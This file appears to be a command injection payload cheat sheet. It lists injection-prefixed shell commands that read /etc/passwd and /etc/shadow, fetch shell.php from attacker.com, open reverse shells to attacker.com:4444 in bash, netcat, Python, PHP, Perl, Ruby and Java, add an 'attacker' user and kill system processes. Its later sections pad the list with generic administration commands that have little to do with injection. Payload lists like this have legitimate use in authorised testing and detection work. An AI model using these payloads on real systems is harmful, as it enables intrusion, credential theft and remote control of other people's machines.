# Command Injection Payloads

## Basic Command Injection
; ls -la
| cat /etc/passwd
`id`
$(whoami)
|| ping -c 5 127.0.0.1
&& sleep 5

## Unix/Linux Commands
; uname -a
| cat /etc/hosts
`ls -la /home`
$(cat /etc/shadow)
|| ifconfig
&& netstat -an

## Windows Commands
& ipconfig
| net user
`systeminfo`
$(tasklist)
|| dir
&& ping 127.0.0.1

## File System Access
; cat /etc/passwd
| head -n 10 /etc/shadow
`tail -f /var/log/auth.log`
$(find / -name "*.conf" 2>/dev/null)
|| ls -la /root
&& cat /proc/version

## Network Commands
; ping -c 5 attacker.com
| nslookup attacker.com
`dig attacker.com`
$(curl http://attacker.com/shell.php)
|| wget http://attacker.com/shell.php
&& nc -zv attacker.com 4444

## Reverse Shells
### Bash
bash -i >& /dev/tcp/attacker.com/4444 0>&1
0<&196;exec 196<>/dev/tcp/attacker.com/4444; sh <&196 >&196 2>&196

### Netcat
nc -e /bin/sh attacker.com 4444
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attacker.com 4444 >/tmp/f

### Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attacker.com",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

### PHP
php -r '$sock=fsockopen("attacker.com",4444);exec("/bin/sh -i <&3 >&3 2>&3");'

### Perl
perl -e 'use Socket;$i="attacker.com";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

### Ruby
ruby -rsocket -e'f=TCPSocket.open("attacker.com",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

### Java
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/attacker.com/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

## File Upload
; wget http://attacker.com/shell.php -O /tmp/shell.php
| curl -o /tmp/shell.php http://attacker.com/shell.php
`fetch -o /tmp/shell.php http://attacker.com/shell.php`
$(axel -n 10 -o /tmp/shell.php http://attacker.com/shell.php)

## Information Gathering
; cat /proc/cpuinfo
| cat /proc/meminfo
`df -h`
$(free -m)
|| uptime
&& whoami

## Process Manipulation
; ps aux
| kill -9 1
`pkill -f apache`
$(killall sshd)
|| service apache2 restart
&& systemctl restart nginx

## User Management
; cat /etc/passwd
| grep -v nologin /etc/passwd
`getent passwd`
$(cut -d: -f1 /etc/passwd)
|| useradd attacker
&& passwd attacker

## Privilege Escalation
; sudo -l
| find / -perm -4000 2>/dev/null
`getcap -r / 2>/dev/null`
$(cat /etc/sudoers)
|| su root
&& sudo su

## Network Scanning
; nmap -sS -sV attacker.com
| netstat -tulpn
`ss -tulpn`
$(arp -a)
|| route -n
&& iptables -L

## DNS Enumeration
; dig ANY @ns1.example.com example.com
| host -t mx example.com
`nslookup -type=any example.com`
$(dnsenum example.com)
|| fierce -dns example.com

## Web Application Testing
; curl -X POST http://example.com/login -d "user=admin&pass=password"
| wget --post-data "user=admin&pass=password" http://example.com/login
`httrack http://example.com`
$(nikto -h http://example.com)

## Database Access
; mysql -u root -p
| psql -U postgres
`mongod --dbpath /data/db`
$(redis-cli)
|| sqlite3 database.db

## Encryption, Encoding and Hashing
; openssl enc -aes-256-cbc -salt -in file.txt -out file.enc
| gpg --encrypt file.txt
`base64 file.txt`
$(md5sum file.txt)
|| sha256sum file.txt

## Compression
; tar -czf archive.tar.gz directory/
| zip -r archive.zip directory/
`7z a archive.7z directory/`
$(rar a archive.rar directory/)
|| gzip file.txt

## Log Manipulation
; tail -f /var/log/apache2/access.log
| grep "password" /var/log/auth.log
`journalctl -u apache2`
$(dmesg | tail -20)
|| last -10

## Scheduled Tasks
; crontab -l
| at -l
`systemctl list-timers`
$(ls -la /etc/cron.*/)
|| cat /etc/crontab

## Environment Variables
; env
| printenv
`set`
$(echo $PATH)
|| export PATH=/tmp:$PATH

## Shell Configuration
; cat ~/.bashrc
| source ~/.bash_profile
`. ~/.profile`
$(alias)
|| history

## System Information
; cat /etc/os-release
| uname -r
`hostname`
$(domainname)
|| dmesg | grep Linux

## Hardware Information
; lspci
| lsusb
`lshw`
$(dmidecode)
|| hwinfo

## Disk Information
; fdisk -l
| parted -l
`lsblk`
$(blkid)
|| mount

## Memory Information
; free -h
| vmstat
`top -n 1`
$(htop)
|| glances

## Network Interfaces
; ifconfig
| ip addr
`ip link`
$(netstat -i)
|| route

## Firewall Rules
; iptables -L
| ufw status
`firewalld-cmd --list-all`
$(nft list ruleset)
|| pfctl -s rules

## Security Tools
; lynis audit system
| rkhunter --check
`chkrootkit`
$(tripwire --check)
|| aide --check

## End of File